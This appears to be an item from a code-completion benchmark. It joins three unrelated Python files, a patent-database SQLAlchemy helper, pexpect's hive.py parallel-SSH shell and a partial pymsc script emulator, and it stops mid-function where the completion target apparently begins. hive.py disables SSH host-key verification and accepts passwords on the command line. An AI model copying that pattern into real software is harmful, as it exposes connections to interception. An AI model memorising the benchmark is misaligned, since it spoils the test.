gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
---|---|
"""
Copyright (c) 2013 The Regents of the University of California, AMERICAN INSTITUTES FOR RESEARCH
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Gabe Fierro [email protected] github.com/gtfierro
"""
"""
Helper functions for database-related functionality.
"""
import os
import re
import ConfigParser
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.sql import exists
from collections import defaultdict
import schema
from match import *
import uuid
from sqlalchemy import exc
from sqlalchemy import event
from sqlalchemy.pool import Pool
from HTMLParser import HTMLParser
h = HTMLParser()
def unescape_html(x):
return h.unescape(x)
import htmlentitydefs
_char = re.compile(r'&(\w+?);')
# Generate some extra HTML entities
defs=htmlentitydefs.entitydefs
defs['apos'] = "'"
entities = open('htmlentities').read().split('\n')
for e in entities:
try:
first = re.sub('\s+|\"|;|&','',e[3:15])
second = re.sub('\s+|\"|;|&','',e[15:24])
define = re.search("(?<=\s\s\').*?$",e).group()
defs[first] = define[:-1].encode('utf-8')
defs[second] = define[:-1].encode('utf-8')
except:
pass
def _char_unescape(m, defs=defs):
try:
return defs[m.group(1)].encode('utf-8','ignore')
except:
return m.group()
def fixid(x):
if 'id' in x:
x['id'] = str(uuid.uuid4())
elif 'uuid' in x:
x['uuid'] = str(uuid.uuid4())
return x
@event.listens_for(Pool, "checkout")
def ping_connection(dbapi_connection, connection_record, connection_proxy):
"""
This keeps the database connection alive over long-running processes (like assignee and location disambiguations)
"""
cursor = dbapi_connection.cursor()
if not hasattr(cursor, 'MySQLError'):
return
try:
# reset the connection settings
cursor.execute("SELECT 1;")
if is_mysql():
cursor.execute("set foreign_key_checks = 0; set unique_checks = 0;")
except:
# raise DisconnectionError - pool will try
# connecting again up to three times before raising.
raise exc.DisconnectionError()
cursor.close()
def is_mysql():
"""
Returns True if currently connected to a MySQL database. Given that our only two options
are MySQL and SQLite, we use this function to determien when we can use certain functions
like `set foreign_key_checks = 0` and `truncate <tablaneme>`.
"""
config = get_config()
return config.get('global').get('database') == 'mysql'
def get_config(localfile="config.ini", default_file=True):
"""
This grabs a configuration file and converts it into
a dictionary.
The default filename is called config.ini
First we load the global file, then we load a local file
"""
if default_file:
openfile = "{0}/config.ini".format(os.path.dirname(os.path.realpath(__file__)))
else:
openfile = localfile
config = defaultdict(dict)
if os.path.isfile(openfile):
cfg = ConfigParser.ConfigParser()
cfg.read(openfile)
for s in cfg.sections():
for k, v in cfg.items(s):
dec = re.compile(r'^\d+(\.\d+)?$')
if v in ("True", "False") or v.isdigit() or dec.match(v):
v = eval(v)
config[s][k] = v
# this enables us to load a local file
if default_file:
newconfig = get_config(localfile, default_file=False)
for section in newconfig:
for item in newconfig[section]:
config[section][item] = newconfig[section][item]
return config
def session_generator(db=None, dbtype='grant'):
"""
Read from config.ini file and load appropriate database
@db: string describing database, e.g. "sqlite" or "mysql"
@dbtype: string indicating if we are fetching the session for
the grant database or the application database
session_generator will return an object taht can be called
to retrieve more sessions, e.g.
sg = session_generator(dbtype='grant')
session1 = sg()
session2 = sg()
etc.
These sessions will be protected with the ping refresher above
"""
config = get_config()
echo = config.get('global').get('echo')
if not db:
db = config.get('global').get('database')
if db[:6] == "sqlite":
sqlite_db_path = os.path.join(
config.get(db).get('path'),
config.get(db).get('{0}-database'.format(dbtype)))
if os.path.basename(os.getcwd()) == 'lib':
sqlite_db_path = '../' + sqlite_db_path
engine = create_engine('sqlite:///{0}'.format(sqlite_db_path), echo=echo, echo_pool=True)
else:
engine = create_engine('mysql+mysqldb://{0}:{1}@{2}/{3}?charset=utf8'.format(
config.get(db).get('user'),
config.get(db).get('password'),
config.get(db).get('host'),
config.get(db).get('{0}-database'.format(dbtype)), echo=echo), pool_size=3, pool_recycle=3600, echo_pool=True)
if dbtype == 'grant':
schema.GrantBase.metadata.create_all(engine)
else:
schema.ApplicationBase.metadata.create_all(engine)
Session = sessionmaker(bind=engine, _enable_transaction_accounting=False)
return scoped_session(Session)
def fetch_session(db=None, dbtype='grant'):
"""
Read from config.ini file and load appropriate database
@db: string describing database, e.g. "sqlite" or "mysql"
@dbtype: string indicating if we are fetching the session for
the grant database or the application database
"""
config = get_config()
echo = config.get('global').get('echo')
if not db:
db = config.get('global').get('database')
if db[:6] == "sqlite":
sqlite_db_path = os.path.join(
config.get(db).get('path'),
config.get(db).get('{0}-database'.format(dbtype)))
engine = create_engine('sqlite:///{0}'.format(sqlite_db_path), echo=echo)
else:
engine = create_engine('mysql+mysqldb://{0}:{1}@{2}/{3}?charset=utf8'.format(
config.get(db).get('user'),
config.get(db).get('password'),
config.get(db).get('host'),
config.get(db).get('{0}-database'.format(dbtype)), echo=echo))
if dbtype == 'grant':
schema.GrantBase.metadata.create_all(engine)
else:
schema.ApplicationBase.metadata.create_all(engine)
Session = sessionmaker(bind=engine, _enable_transaction_accounting=False)
session = Session()
return session
def add_grant(obj, override=True, temp=False):
"""
PatentGrant Object converting to tables via SQLAlchemy
Necessary to convert dates to datetime because of SQLite (OK on MySQL)
Case Sensitivity and Table Reflection
MySQL has inconsistent support for case-sensitive identifier names,
basing support on specific details of the underlying operating system.
However, it has been observed that no matter what case sensitivity
behavior is present, the names of tables in foreign key declarations
are always received from the database as all-lower case, making it
impossible to accurately reflect a schema where inter-related tables
use mixed-case identifier names.
Therefore it is strongly advised that table names be declared as all
lower case both within SQLAlchemy as well as on the MySQL database
itself, especially if database reflection features are to be used.
"""
# if a patent exists, remove it so we can replace it
(patent_exists, ), = grantsession.query(exists().where(schema.Patent.number == obj.patent))
#pat_query = grantsession.query(Patent).filter(Patent.number == obj.patent)
#if pat_query.count():
if patent_exists:
if override:
pat_query = grantsession.query(schema.Patent).filter(schema.Patent.id == obj.patent)
grantsession.delete(pat_query.one())
else:
return
if len(obj.pat["number"]) < 3:
return
pat = schema.Patent(**obj.pat)
pat.application = schema.Application(**obj.app)
# lots of abstracts seem to be missing. why?
add_all_fields(obj, pat)
if is_mysql():
grantsession.execute('set foreign_key_checks = 0;')
grantsession.execute('set unique_checks = 0;')
#grantsession.commit()
grantsession.merge(pat)
def add_all_fields(obj, pat):
add_asg(obj, pat)
add_inv(obj, pat)
add_law(obj, pat)
add_usreldoc(obj, pat)
add_classes(obj, pat)
add_ipcr(obj, pat)
add_citations(obj, pat)
add_claims(obj, pat)
add_current_classes(obj, pat)
def add_asg(obj, pat):
for asg, loc in obj.assignee_list:
asg = fixid(asg)
asg['organization'] = unescape_html(asg['organization'])
loc = fixid(loc)
asg = schema.RawAssignee(**asg)
loc = schema.RawLocation(**loc)
grantsession.merge(loc)
asg.rawlocation = loc
pat.rawassignees.append(asg)
def add_inv(obj, pat):
for inv, loc in obj.inventor_list:
inv = fixid(inv)
loc = fixid(loc)
inv = schema.RawInventor(**inv)
loc = schema.RawLocation(**loc)
grantsession.merge(loc)
inv.rawlocation = loc
pat.rawinventors.append(inv)
def add_law(obj, pat):
for law in obj.lawyer_list:
law = fixid(law)
law = schema.RawLawyer(**law)
pat.rawlawyers.append(law)
def add_usreldoc(obj, pat):
for usr in obj.us_relation_list:
usr = fixid(usr)
usr["rel_id"] = usr["number"]
usr = schema.USRelDoc(**usr)
pat.usreldocs.append(usr)
def add_classes(obj, pat):
for uspc, mc, sc in obj.us_classifications:
uspc = fixid(uspc)
uspc = schema.USPC(**uspc)
mc = schema.MainClass(**mc)
sc = schema.SubClass(**sc)
grantsession.merge(mc)
grantsession.merge(sc)
uspc.mainclass = mc
uspc.subclass = sc
pat.classes.append(uspc)
def add_current_classes(obj, pat):
for uspc_current, mc, sc in obj.us_classifications:
uspc_current = fixid(uspc_current)
uspc_current = schema.USPC_current(**uspc_current)
mc = schema.MainClass_current(**mc)
sc = schema.SubClass_current(**sc)
grantsession.merge(mc)
grantsession.merge(sc)
uspc_current.mainclass_current = mc
uspc_current.subclass_current = sc
pat.current_classes.append(uspc_current)
def add_ipcr(obj, pat):
for ipc in obj.ipcr_classifications:
ipc = schema.IPCR(**ipc)
pat.ipcrs.append(ipc)
def add_citations(obj, pat):
cits, refs = obj.citation_list
for cit in cits:
if cit['country'] == 'US':
# granted patent doc number
if re.match(r'^[A-Z]*\d+$', cit['number']):
cit['citation_id'] = cit['number']
cit = fixid(cit)
cit = schema.USPatentCitation(**cit)
pat.uspatentcitations.append(cit)
# if not above, it's probably an application
else:
cit['application_id'] = cit['number']
cit = fixid(cit)
cit = schema.USApplicationCitation(**cit)
pat.usapplicationcitations.append(cit)
# if not US, then foreign citation
else:
cit = fixid(cit)
cit = schema.ForeignCitation(**cit)
pat.foreigncitations.append(cit)
for ref in refs:
ref = fixid(ref)
ref = schema.OtherReference(**ref)
pat.otherreferences.append(ref)
def add_claims(obj, pat):
claims = obj.claims
for claim in claims:
claim = fixid(claim)
claim['text'] = unescape_html(claim['text'])
claim['text'] = _char.sub(_char_unescape,claim['text'])
clm = schema.Claim(**claim)
pat.claims.append(clm)
def commit():
try:
grantsession.commit()
except Exception, e:
grantsession.rollback()
print str(e)
def add_application(obj, override=True, temp=False):
"""
PatentApplication Object converting to tables via SQLAlchemy
Necessary to convert dates to datetime because of SQLite (OK on MySQL)
Case Sensitivity and Table Reflection
MySQL has inconsistent support for case-sensitive identifier names,
basing support on specific details of the underlying operating system.
However, it has been observed that no matter what case sensitivity
behavior is present, the names of tables in foreign key declarations
are always received from the database as all-lower case, making it
impossible to accurately reflect a schema where inter-related tables
use mixed-case identifier names.
Therefore it is strongly advised that table names be declared as all
lower case both within SQLAlchemy as well as on the MySQL database
itself, especially if database reflection features are to be used.
"""
# if the application exists, remove it so we can replace it
(app_exists, ), = appsession.query(exists().where(schema.App_Application.number == obj.application))
if app_exists:
if override:
app_query = appsession.query(schema.App_Application).filter(schema.App_Application.number == obj.application)
appsession.delete(app_query.one())
else:
return
if len(obj.app["number"]) < 3:
return
app = schema.App_Application(**obj.app)
# lots of abstracts seem to be missing. why?
add_all_app_fields(obj, app)
appsession.merge(app)
def add_all_app_fields(obj, app):
add_app_asg(obj, app)
add_app_inv(obj, app)
add_app_classes(obj, app)
add_app_claims(obj, app)
add_app_current_classes(obj, app)
def add_app_asg(obj, app):
for asg, loc in obj.assignee_list:
loc = fixid(loc)
asg = fixid(asg)
asg['organization'] = unescape_html(asg['organization'])
asg = schema.App_RawAssignee(**asg)
loc = schema.App_RawLocation(**loc)
appsession.merge(loc)
asg.rawlocation = loc
app.rawassignees.append(asg)
def add_app_inv(obj, app):
for inv, loc in obj.inventor_list:
loc = fixid(loc)
inv = fixid(inv)
inv = schema.App_RawInventor(**inv)
loc = schema.App_RawLocation(**loc)
appsession.merge(loc)
inv.rawlocation = loc
app.rawinventors.append(inv)
def add_app_classes(obj, app):
for uspc, mc, sc in obj.us_classifications:
uspc = fixid(uspc)
uspc = schema.App_USPC(**uspc)
mc = schema.App_MainClass(**mc)
sc = schema.App_SubClass(**sc)
appsession.merge(mc)
appsession.merge(sc)
uspc.mainclass = mc
uspc.subclass = sc
app.classes.append(uspc)
def add_app_current_classes(obj, app):
for uspc_current, mc, sc in obj.us_classifications:
uspc_current = fixid(uspc_current)
uspc_current = schema.App_USPC_current(**uspc_current)
mc = schema.App_MainClass_current(**mc)
sc = schema.App_SubClass_current(**sc)
appsession.merge(mc)
appsession.merge(sc)
uspc_current.mainclass_current = mc
uspc_current.subclass_current = sc
app.current_classes.append(uspc_current)
def add_app_ipcr(obj, app):
for ipc in obj.ipcr_classifications:
ipc = schema.App_IPCR(**ipc)
app.ipcrs.append(ipc)
def add_app_claims(obj, app):
claims = obj.claims
for claim in claims:
claim = fixid(claim)
claim['text'] = unescape_html(claim['text'])
claim['text'] = _char.sub(_char_unescape,claim['text'])
clm = schema.App_Claim(**claim)
app.claims.append(clm)
def commit_application():
try:
appsession.commit()
except Exception, e:
appsession.rollback()
print str(e)
grantsession = fetch_session(dbtype='grant')
appsession = fetch_session(dbtype='application')
session = grantsession # default for clean and consolidate
|
|
#!/usr/bin/env python
'''hive -- Hive Shell
This lets you ssh to a group of servers and control them as if they were one.
Each command you enter is sent to each host in parallel. The response of each
host is collected and printed. In normal synchronous mode Hive will wait for
each host to return the shell command line prompt. The shell prompt is used to
sync output.
Example:
$ hive.py --sameuser --samepass host1.example.com host2.example.net
username: myusername
password:
connecting to host1.example.com - OK
connecting to host2.example.net - OK
targetting hosts: 192.168.1.104 192.168.1.107
CMD (? for help) > uptime
=======================================================================
host1.example.com
-----------------------------------------------------------------------
uptime
23:49:55 up 74 days, 5:14, 2 users, load average: 0.15, 0.05, 0.01
=======================================================================
host2.example.net
-----------------------------------------------------------------------
uptime
23:53:02 up 1 day, 13:36, 2 users, load average: 0.50, 0.40, 0.46
=======================================================================
Other Usage Examples:
1. You will be asked for your username and password for each host.
hive.py host1 host2 host3 ... hostN
2. You will be asked once for your username and password.
This will be used for each host.
hive.py --sameuser --samepass host1 host2 host3 ... hostN
3. Give a username and password on the command-line:
hive.py user1:pass2@host1 user2:pass2@host2 ... userN:passN@hostN
You can use an extended host notation to specify username, password, and host
instead of entering auth information interactively. Where you would enter a
host name use this format:
username:password@host
This assumes that ':' is not part of the password. If your password contains a
':' then you can use '\\:' to indicate a ':' and '\\\\' to indicate a single
'\\'. Remember that this information will appear in the process listing. Anyone
on your machine can see this auth information. This is not secure.
This is a crude script that begs to be multithreaded. But it serves its
purpose.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
from __future__ import print_function
from __future__ import absolute_import
# TODO add feature to support username:password@host combination
# TODO add feature to log each host output in separate file
import sys
import os
import re
import optparse
import time
import getpass
import readline
import atexit
try:
import pexpect
import pxssh
except ImportError:
sys.stderr.write("You do not have 'pexpect' installed.\n")
sys.stderr.write("On Ubuntu you need the 'python-pexpect' package.\n")
sys.stderr.write(" aptitude -y install python-pexpect\n")
exit(1)
try:
raw_input
except NameError:
raw_input = input
histfile = os.path.join(os.environ["HOME"], ".hive_history")
try:
readline.read_history_file(histfile)
except IOError:
pass
atexit.register(readline.write_history_file, histfile)
CMD_HELP='''Hive commands are preceded by a colon : (just think of vi).
:target name1 name2 name3 ...
set list of hosts to target commands
:target all
reset list of hosts to target all hosts in the hive.
:to name command
send a command line to the named host. This is similar to :target, but
sends only one command and does not change the list of targets for future
commands.
:sync
set mode to wait for shell prompts after commands are run. This is the
default. When Hive first logs into a host it sets a special shell prompt
pattern that it can later look for to synchronize output of the hosts. If
you 'su' to another user then it can upset the synchronization. If you need
to run something like 'su' then use the following pattern:
CMD (? for help) > :async
CMD (? for help) > sudo su - root
CMD (? for help) > :prompt
CMD (? for help) > :sync
:async
set mode to not expect command line prompts (see :sync). Afterwards
commands are send to target hosts, but their responses are not read back
until :sync is run. This is useful to run before commands that will not
return with the special shell prompt pattern that Hive uses to synchronize.
:refresh
refresh the display. This shows the last few lines of output from all hosts.
This is similar to resync, but does not expect the promt. This is useful
for seeing what hosts are doing during long running commands.
:resync
This is similar to :sync, but it does not change the mode. It looks for the
prompt and thus consumes all input from all targetted hosts.
:prompt
force each host to reset command line prompt to the special pattern used to
synchronize all the hosts. This is useful if you 'su' to a different user
where Hive would not know the prompt to match.
:send my text
This will send the 'my text' wihtout a line feed to the targetted hosts.
This output of the hosts is not automatically synchronized.
:control X
This will send the given control character to the targetted hosts.
For example, ":control c" will send ASCII 3.
:exit
This will exit the hive shell.
'''
def login (args, cli_username=None, cli_password=None):
# I have to keep a separate list of host names because Python dicts are not ordered.
# I want to keep the same order as in the args list.
host_names = []
hive_connect_info = {}
hive = {}
# build up the list of connection information (hostname, username, password, port)
for host_connect_string in args:
hcd = parse_host_connect_string (host_connect_string)
hostname = hcd['hostname']
port = hcd['port']
if port == '':
port = None
if len(hcd['username']) > 0:
username = hcd['username']
elif cli_username is not None:
username = cli_username
else:
username = raw_input('%s username: ' % hostname)
if len(hcd['password']) > 0:
password = hcd['password']
elif cli_password is not None:
password = cli_password
else:
password = getpass.getpass('%s password: ' % hostname)
host_names.append(hostname)
hive_connect_info[hostname] = (hostname, username, password, port)
# build up the list of hive connections using the connection information.
for hostname in host_names:
print('connecting to', hostname)
try:
fout = file("log_"+hostname, "w")
hive[hostname] = pxssh.pxssh()
# Disable host key checking.
hive[hostname].SSH_OPTS = (hive[hostname].SSH_OPTS
+ " -o 'StrictHostKeyChecking=no'"
+ " -o 'UserKnownHostsFile /dev/null' ")
hive[hostname].force_password = True
hive[hostname].login(*hive_connect_info[hostname])
print(hive[hostname].before)
hive[hostname].logfile = fout
print('- OK')
except Exception as e:
print('- ERROR', end=' ')
print(str(e))
print('Skipping', hostname)
hive[hostname] = None
return host_names, hive
def main ():
global options, args, CMD_HELP
rows = 24
cols = 80
if options.sameuser:
cli_username = raw_input('username: ')
else:
cli_username = None
if options.samepass:
cli_password = getpass.getpass('password: ')
else:
cli_password = None
host_names, hive = login(args, cli_username, cli_password)
synchronous_mode = True
target_hostnames = host_names[:]
print('targetting hosts:', ' '.join(target_hostnames))
while True:
cmd = raw_input('CMD (? for help) > ')
cmd = cmd.strip()
if cmd=='?' or cmd==':help' or cmd==':h':
print(CMD_HELP)
continue
elif cmd==':refresh':
refresh (hive, target_hostnames, timeout=0.5)
for hostname in target_hostnames:
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
else:
print(hive[hostname].before)
print('#' * 79)
continue
elif cmd==':resync':
resync (hive, target_hostnames, timeout=0.5)
for hostname in target_hostnames:
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
else:
print(hive[hostname].before)
print('#' * 79)
continue
elif cmd==':sync':
synchronous_mode = True
resync (hive, target_hostnames, timeout=0.5)
continue
elif cmd==':async':
synchronous_mode = False
continue
elif cmd==':prompt':
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].set_unique_prompt()
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:5] == ':send':
cmd, txt = cmd.split(None,1)
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].send(txt)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:3] == ':to':
cmd, hostname, txt = cmd.split(None,2)
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
continue
try:
hive[hostname].sendline (txt)
hive[hostname].prompt(timeout=2)
print(hive[hostname].before)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:7] == ':expect':
cmd, pattern = cmd.split(None,1)
print('looking for', pattern)
try:
for hostname in target_hostnames:
if hive[hostname] is not None:
hive[hostname].expect(pattern)
print(hive[hostname].before)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd[:7] == ':target':
target_hostnames = cmd.split()[1:]
if len(target_hostnames) == 0 or target_hostnames[0] == all:
target_hostnames = host_names[:]
print('targetting hosts:', ' '.join(target_hostnames))
continue
elif cmd == ':exit' or cmd == ':q' or cmd == ':quit':
break
elif cmd[:8] == ':control' or cmd[:5] == ':ctrl' :
cmd, c = cmd.split(None,1)
if ord(c)-96 < 0 or ord(c)-96 > 255:
print('/' + '=' * (cols - 2))
print('| Invalid character. Must be [a-zA-Z], @, [, ], \\, ^, _, or ?')
print('\\' + '-' * (cols - 2))
continue
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].sendcontrol(c)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
continue
elif cmd == ':esc':
for hostname in target_hostnames:
if hive[hostname] is not None:
hive[hostname].send(chr(27))
continue
#
# Run the command on all targets in parallel
#
for hostname in target_hostnames:
try:
if hive[hostname] is not None:
hive[hostname].sendline (cmd)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
#
# print the response for each targeted host.
#
if synchronous_mode:
for hostname in target_hostnames:
try:
print('/' + '=' * (cols - 2))
print('| ' + hostname)
print('\\' + '-' * (cols - 2))
if hive[hostname] is None:
print('# DEAD: %s' % hostname)
else:
hive[hostname].prompt(timeout=2)
print(hive[hostname].before)
except Exception as e:
print("Had trouble communicating with %s, so removing it from the target list." % hostname)
print(str(e))
hive[hostname] = None
print('#' * 79)
def refresh (hive, hive_names, timeout=0.5):
'''This waits for the TIMEOUT on each host.
'''
# TODO This is ideal for threading.
for hostname in hive_names:
if hive[hostname] is not None:
hive[hostname].expect([pexpect.TIMEOUT,pexpect.EOF],timeout=timeout)
def resync (hive, hive_names, timeout=2, max_attempts=5):
'''This waits for the shell prompt for each host in an effort to try to get
them all to the same state. The timeout is set low so that hosts that are
already at the prompt will not slow things down too much. If a prompt match
is made for a hosts then keep asking until it stops matching. This is a
best effort to consume all input if it printed more than one prompt. It's
kind of kludgy. Note that this will always introduce a delay equal to the
timeout for each machine. So for 10 machines with a 2 second delay you will
get AT LEAST a 20 second delay if not more. '''
# TODO This is ideal for threading.
for hostname in hive_names:
if hive[hostname] is not None:
for attempts in range(0, max_attempts):
if not hive[hostname].prompt(timeout=timeout):
break
def parse_host_connect_string (hcs):
'''This parses a host connection string in the form
username:password@hostname:port. All fields are options expcet hostname. A
dictionary is returned with all four keys. Keys that were not included are
set to empty strings ''. Note that if your password has the '@' character
then you must backslash escape it. '''
if '@' in hcs:
p = re.compile (r'(?P<username>[^@:]*)(:?)(?P<password>.*)(?!\\)@(?P<hostname>[^:]*):?(?P<port>[0-9]*)')
else:
p = re.compile (r'(?P<username>)(?P<password>)(?P<hostname>[^:]*):?(?P<port>[0-9]*)')
m = p.search (hcs)
d = m.groupdict()
d['password'] = d['password'].replace('\\@','@')
return d
if __name__ == '__main__':
start_time = time.time()
parser = optparse.OptionParser(formatter=optparse.TitledHelpFormatter(), usage=globals()['__doc__'], version='$Id: hive.py 533 2012-10-20 02:19:33Z noah $',conflict_handler="resolve")
parser.add_option ('-v', '--verbose', action='store_true', default=False, help='verbose output')
parser.add_option ('--samepass', action='store_true', default=False, help='Use same password for each login.')
parser.add_option ('--sameuser', action='store_true', default=False, help='Use same username for each login.')
(options, args) = parser.parse_args()
if len(args) < 1:
parser.error ('missing argument')
if options.verbose: print(time.asctime())
main()
if options.verbose: print(time.asctime())
if options.verbose: print('TOTAL TIME IN MINUTES:', end=' ')
if options.verbose: print((time.time() - start_time) / 60.0)
|
|
#**************************************************************************#
# This file is part of pymsc which is released under MIT License. See file #
# LICENSE or go to https://github.com/jam1garner/pymsc/blob/master/LICENSE #
# for full license details. #
#**************************************************************************#
import struct
from sys import argv
from msc import *
from param import *
from time import sleep
from random import randint,random
from os.path import isfile
from argparse import ArgumentParser
from math import sqrt, cos, sin, atan2
class FunctionInfo:
def __init__(self, thisLocalVarPos, returnAddress, stackPos):
self.localVarPos = thisLocalVarPos
self.returnAddress = returnAddress
self.stackPos = stackPos
def restore(self):
global evalPos, localVarPos
localVarPos = self.localVarPos
evalPos = returnAddress
#Simulate an MSC syscall given the information from
def syscall(syscallNum, args, pushBit):
global sharedVars,evalPos,stack,y_unit
#Random int in range
if syscallNum == 0x9:
push(randint(args[0], args[1]-1), pushBit)
#Variable access
elif syscallNum == 0x16:
operation = args[0]
if operation == 0x6:
if not args[1] in sharedVars:
print("ERROR: Variable 0x%08X doesn't not exist (Accessed at %X)" % (args[1],evalPos))
quit()
else:
push(sharedVars[args[1]], pushBit)
elif operation == 0x7:
sharedVars[args[2]] = args[1]
elif operation == 0x10:
if not args[1] in sharedVars:
print("ERROR: Variable 0x%08X doesn't not exist (Accessed at %X)" % (args[1],evalPos))
quit()
else:
push(0 if sharedVars[args[1]] == 0 else 1, pushBit)
elif operation == 0x2710:
sharedVars[args[1]] = 0
elif operation == 0x2711:
sharedVars[args[1]] = 1
elif syscallNum == 0xA:
operation = args[0]
if operation == 0: #sqrt
push(sqrt(intToFloat(args[1])),pushBit)
elif operation == 1: #angle
push(atan2(intToFloat(args[1]), intToFloat(args[2])),pushBit)
elif operation == 2:
push(intToFloat(args[1])**args[2],pushBit)
elif operation == 3:
push(sqrt((intToFloat(args[1])**2)+(intToFloat(args[2])**2)+(intToFloat(args[3])**2)),pushBit)
elif operation == 4:
push(cos(intToFloat(args[1])),pushBit)
elif operation == 5:
push(sin(intToFloat(args[1])),pushBit)
elif operation == 6:
push(random(), pushBit)
elif operation == 7:
push(abs(atan2(intToFloat(args[1]), intToFloat(args[2])) - atan2(intToFloat(args[3]), intToFloat(args[4]))),pushBit)
elif operation == 8:
push(y_unit, pushBit)
elif operation == 0xA:
mag = sqrt((intToFloat(args[1])**2)+(intToFloat(args[2])**2))
x = intToFloat(args[1]) / mag
y_unit = intToFloat(args[2]) / mag
push(x,pushBit)
#Variable access
elif syscallNum == 0x17:
operation = args[0]
if operation == 0x0:
if not args[1] in sharedVars:
print("ERROR: Variable 0x%08X doesn't not exist (Accessed at %X)" % (args[1],evalPos))
quit()
else:
push(sharedVars[args[1]], pushBit)
#Debug stack dump
elif syscallNum == 0xF0:
stackString = "DEBUG: ["
for i in range(len(stack)):
if stack[i] != None:
stackString += ('*' if i == stackPos else '') + hex(stack[i]) + (', ' if i != len(stack) - 1 else '')
if stackString != "[":
stackString = stackString[:-2]
print("Stack [Position = %i] - %s" % (stackPos, str([intToFloat(j) if j else 0 for j in stack])))
#Debug var print
elif syscallNum == 0xF1:
if len(args) == 0:
l = tuple(["0x%08X : 0x%08X, " % (i,j) for i,j in sharedVars.items()])
print('DEBUG: {' + (('%s' * len(l)) % l).rstrip(', ') + '}')
else:
if args[0] in sharedVars:
print("DEBUG: 0x%08X = 0x%08X" % (args[0], sharedVars[args[0]]))
else:
print("ERROR: Unsupported syscall 0x%X at location %X" % (syscallNum,evalPos))
quit()
#push a value onto the stack given that the push bit is enabled
def push(val, actuallyPush=True):
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if not actuallyPush:
return
if stackPos == 0x80:
print("At instruction %08X:")
print("WARNING: STACK OVERFLOW, STACK INDEX OVERWRITTEN ")
newVal = None
if type(val) == int:
newVal = (val & 0xFFFFFFFF)
elif type(val) == float:
newVal = floatToInt(val)
else:
print("ERROR: Invalid type to push type=%s at position %X (Object = %s)" % (str(type(val)), evalPos, str(val)))
raise TypeError("Invalid push type")
if stackPos < 0x80 and stackPos >= 0:
stack[stackPos] = newVal
elif stackPos == 0x80:
stackPos = newVal
elif stackPos < 0:
globalVars[0x8A + stackPos] = newVal
else:
print("WARNING: WRITE OOB (Not in emulated memory)")
stackPos += 1
def pop():
global mscFile,mscFileBytes,stack,functionStack,stackPos,localVarPos,evalPos,exceptionRegister,globalVars,executing,strings,linkRegister
if stackPos == 0:
print("At instruction %08X:" % evalPos)
print("WARNING: STACK UNDERFLOW")
stackPos -= 1
value = None
if stackPos < 0 and stackPos >= -0x8A:
value = globalVars[0x8A + stackPos]
elif stackPos >= 0 and stackPos < 0x80:
value = stack[stackPos]
elif value == 0x80:
value = stackPos
else:
